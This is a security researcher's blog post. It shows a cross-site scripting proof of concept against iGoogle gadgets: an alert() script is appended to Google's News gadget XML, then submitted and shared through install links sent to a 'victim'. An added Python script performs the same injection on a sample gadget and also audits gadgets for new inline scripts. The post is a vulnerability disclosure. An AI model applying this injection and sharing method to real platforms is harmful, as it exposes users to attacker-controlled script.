iGoogle is a personalized homepage service from Google. Among its features is the ability to add web feeds and gadgets to your page, and Google lets any user write and submit their own gadget. So the plan is:
- Write crafted gadget
- Submit crafted gadget
- Share it
- Exploit it !
Let's go …
1. Write crafted gadget
I got the “Google News” gadget by downloading the following XML file:
http://www.gstatic.com/ig/modules/tabnews/kennedy/tabnews.xml
and appended my own <script> tag to the end of its HTML content, like this:
…
ud=K.getString(x),vd=K.getMsg(x),wd=/\.cn$/.test(location.host);wd||!ud||ud==vd?pd():sd(ud); window.updateCustomEdit=kd;window.saveConfig=td;window.hideSettingsBlock=jd;})()</script>
<script>alert(/XSS by @MaKyOtOx/);</script>
<div id=settings_mask onclick="return false;"></div>
<div id=settings_block>
<div id=settings_content></div>
</div>
</Content></Module>
2. Submit crafted gadget
I uploaded my XML here: http://www.makyoto.fr/xss/poc.xml
Then, once I had customized my gadget, I submitted it here: http://www.google.com/ig/submit
The submission reported no error in the crafted XML file, so poc.xml was accepted and ready to be used as a gadget ^^
3. Share it
The gadget is easy to share with friends using the official sharing features. Either of the following links can be sent to the victim:
http://www.google.com/ig/adde?moduleurl=www.makyoto.fr/xss/poc.xml%253C&source=imag
or
http://www.google.com/ig/directory?type=gadgets&url=www.makyoto.fr/xss/poc.xml
If the victim chooses to add the gadget, the widget now appears in their iGoogle dashboard and the injected script runs inside it.
4. Exploit it !
You are bad guys …
The Google Security Team answered me: “the domain in which the feature is hosted – gmodules.com – is specifically meant as a compartmentalized ‘sandbox’ for various types of potentially unsafe, user-controlled content. This domain is isolated from any sensitive content due to the same-origin policy.”
Yes, they are right in that I cannot access the user's authentication cookies, but I can render and script whatever I want inside the gadget … And what if an attacker gets control of the XML file of a popular gadget?
Nevertheless, I continue to believe this is a vulnerability, because the gadget XML is not sufficiently sanitized before being processed.
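The following Python script is an added example and is not the author's code or Google's. It reproduces step 1 of the procedure above on a constructed minimal gadget (modelled on the <Module>/<Content type="html"> CDATA structure the excerpt shows, not the real tabnews.xml) and then shows the check a practitioner would want against the closing worry: comparing a fetched gadget with a pinned known-good copy and listing any inline <script> that was not there before. The sample gadget, the payload placement and the function names are assumptions for illustration.

```python
import hashlib
import re
import xml.etree.ElementTree as ET

# Constructed sample gadget (not the real Google News gadget): a <Module> whose
# html <Content> carries markup and one legitimate inline script inside CDATA.
ORIGINAL_GADGET = """<Module>
  <ModulePrefs title="Example News" />
  <Content type="html"><![CDATA[
<div id="news"></div>
<script>document.getElementById('news').textContent = 'loading...';</script>
]]></Content>
</Module>
"""

# Matches the opening of the html Content CDATA block, its body, and its close.
CDATA_RE = re.compile(
    r'(<Content\b[^>]*type="html"[^>]*>\s*<!\[CDATA\[)(.*?)(\]\]>\s*</Content>)',
    re.S,
)


def inject_script(gadget_xml, payload):
    """Step 1 of the post: append `payload` at the end of the gadget's HTML content.

    The CDATA wrapper is kept intact so the result is still well-formed gadget XML.
    """
    m = CDATA_RE.search(gadget_xml)
    if m is None:
        raise ValueError("no html Content CDATA section found")
    body = m.group(2).rstrip() + "\n" + payload + "\n"
    return gadget_xml[: m.start(2)] + body + gadget_xml[m.end(2):]


def inline_scripts(gadget_xml):
    """Return the body of every inline <script> in the gadget's html Content sections.

    ElementTree exposes the CDATA content as the element's text, so the HTML can be
    scanned as a plain string.
    """
    root = ET.fromstring(gadget_xml)
    bodies = []
    for content in root.iter("Content"):
        if content.get("type") != "html" or not content.text:
            continue
        found = re.findall(r"<script\b[^>]*>(.*?)</script>", content.text, re.S | re.I)
        bodies.extend(s.strip() for s in found)
    return bodies


def gadget_digest(gadget_xml):
    """SHA-256 of the gadget file, for pinning a known-good copy."""
    return hashlib.sha256(gadget_xml.encode("utf-8")).hexdigest()


def audit(known_good_xml, candidate_xml):
    """Compare a freshly fetched gadget against a pinned copy.

    Reports whether the file is byte-identical and which inline scripts are new,
    which is exactly the change the attacker in the post relies on going unnoticed.
    """
    known = set(inline_scripts(known_good_xml))
    new_scripts = [s for s in inline_scripts(candidate_xml) if s not in known]
    return {
        "hash_matches": gadget_digest(known_good_xml) == gadget_digest(candidate_xml),
        "new_inline_scripts": new_scripts,
    }


# The payload from the post, appended the way the excerpt shows.
PAYLOAD = "<script>alert(/XSS by @MaKyOtOx/);</script>"
CRAFTED_GADGET = inject_script(ORIGINAL_GADGET, PAYLOAD)

if __name__ == "__main__":
    print(CRAFTED_GADGET)
    print(audit(ORIGINAL_GADGET, CRAFTED_GADGET))
```

Pinning a hash of a third-party gadget and diffing its inline scripts does not make the content trusted, but it does turn a silent change to a popular gadget's XML into something a user or a directory operator can notice before the script reaches the dashboard.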
Tweets are welcome @MaKyOtOx and @devquotes
great :)